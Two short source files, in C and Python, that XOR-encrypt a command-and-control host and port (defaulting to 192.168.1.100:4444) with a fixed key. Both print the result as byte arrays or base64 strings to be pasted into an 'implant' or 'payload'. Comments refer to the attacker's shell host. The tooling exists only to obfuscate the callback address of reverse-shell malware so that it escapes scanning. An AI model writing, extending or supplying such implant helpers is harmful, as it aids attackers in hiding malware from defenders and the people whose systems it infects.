File: c/enc.c
#include <stdio.h>
#include <string.h>
#include <stdint.h>

// Your key (must match implant side)
static const unsigned char KEY[32] = {
    'X','X','X','X','X','X','X','X','X','X','X','X','X','X','X','X',
    'X','X','X','X','X','X','X','X','X','X','X','X','X','X','X','X'
};

void xor_encrypt(const unsigned char* in, int in_len, unsigned char* out, const unsigned char* key, int key_len) {
    for (int i = 0; i < in_len; ++i) {
        out[i] = in[i] ^ key[i % key_len];
    }
}

int main() {
    // Change these as needed
    const char* HOST = "192.168.1.100";   // same as your shell's host
    const char* PORT = "4444";             // same as your shell's port

    unsigned char enc_host[64] = {0};
    unsigned char enc_port[16] = {0};

    int h_len = strlen(HOST);
    int p_len = strlen(PORT);

    // Encrypt host
    xor_encrypt((const unsigned char*)HOST, h_len, enc_host, KEY, 32);

    // Encrypt port
    xor_encrypt((const unsigned char*)PORT, p_len, enc_port, KEY, 32);

    // Print to stdout (copy into your implant)
    printf("// ENCRYPTED_HOST\nstatic const unsigned char ENCRYPTED_HOST[] = {\n");
    for (int i = 0; i < h_len; ++i) {
        printf("0x%02x, ", enc_host[i]);
    }
    printf("\n};\n\n");

    printf("// ENCRYPTED_PORT\nstatic const unsigned char ENCRYPTED_PORT[] = {\n");
    for (int i = 0; i < p_len; ++i) {
        printf("0x%02x, ", enc_port[i]);
    }
    printf("\n};\n");

    return 0;
}

File: python/enc.py
import base64

def xor_encrypt(data: str, key: bytes) -> bytes:
    data_bytes = data.encode()
    return bytes(
        a ^ b
        for a, b in zip(
            data_bytes,
            (key * ((len(data_bytes) // len(key)) + 1))[: len(data_bytes)]
        )
    )


def main():
    HOST = input("Enter C2 HOST (e.g., 192.168.1.10): ").strip()
    PORT = input("Enter C2 PORT (e.g., 4444): ").strip()

    KEY = b"X" * 32  # must match your payload's KEY

    enc_host = xor_encrypt(HOST, KEY)
    enc_port = xor_encrypt(PORT, KEY)

    b64_host = base64.b64encode(enc_host).decode()
    b64_port = base64.b64encode(enc_port).decode()

    print("\nPaste into your payload:")
    print(f"KEY = {KEY!r}")
    print(f'ENCRYPTED_HOST = base64.b64decode("{b64_host}")')
    print(f'ENCRYPTED_PORT = base64.b64decode("{b64_port}")')


if __name__ == "__main__":
    main()
